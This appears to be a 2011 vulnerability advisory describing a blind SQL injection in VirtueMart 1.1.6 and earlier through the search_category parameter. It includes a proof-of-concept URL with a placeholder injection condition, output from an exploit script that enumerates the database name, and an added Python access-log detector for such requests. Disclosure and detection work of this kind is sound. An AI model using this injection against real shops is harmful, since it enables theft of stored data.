VirtueMart vulnerability

Blind SQL-Injection

Posted by Andrea Fabrizi on January 31, 2011

VirtueMart <= 1.1.6 is vulnerable to a blind SQL injection through the search_category parameter.

POC

http://127.0.0.1/index.php?category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=3 AND $BLIND_SQL --
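A log-side check for requests of this shape, as an added example that is not part of the original post: it flags com_virtuemart requests whose search_category is not a plain integer and counts them per client, since blind enumeration produces many such requests. The combined access-log format, the numeric-only rule for search_category and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: search_category is a numeric category id (the PoC uses 3) or empty.
NUMERIC_ID_RE = re.compile(r"[0-9]*")

def suspicious_search_category(log_line):
    """Return the decoded search_category value if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if match is None:
        return None
    params = parse_qs(urlsplit(match.group("target")).query, keep_blank_values=True)
    if "com_virtuemart" not in params.get("option", []):
        return None
    for value in params.get("search_category", []):
        if not NUMERIC_ID_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Count flagged requests per client address (first field of each log line)."""
    hits = Counter()
    for line in lines:
        if suspicious_search_category(line) is not None:
            hits[line.split(" ", 1)[0]] += 1
    return hits

# Constructed sample log lines; $BLIND_SQL is the placeholder used in the PoC above.
_BASE = "/index.php?page=shop.browse&option=com_virtuemart&search_category="
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jan/2011:10:00:00 +0000] "GET ' + _BASE + '3 HTTP/1.1" 200 5120',
    '192.0.2.99 - - [31/Jan/2011:10:00:05 +0000] "GET ' + _BASE + '3%20AND%20$BLIND_SQL%20-- HTTP/1.1" 200 5120',
    '192.0.2.99 - - [31/Jan/2011:10:00:06 +0000] "GET ' + _BASE + '3+AND+$BLIND_SQL+-- HTTP/1.1" 200 5120',
    '192.0.2.10 - - [31/Jan/2011:10:00:09 +0000] "GET ' + _BASE + ' HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, count in scan(SAMPLE_LOG).items():
        print(f"{client}: {count} request(s) with non-numeric search_category")
```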

Exploit

$ ./virtuemart_sql_exploit.sh
- Getting cookies... OK
- Starting enumeration...

1) .............. -> j
2) .................... -> o
3) .................... -> o
4) ................ -> m
5) ............... -> l
6) . -> a
7) .....................................................................

 -> joomla

The exploit is available here

BID: http://www.securityfocus.com/bid/46070/info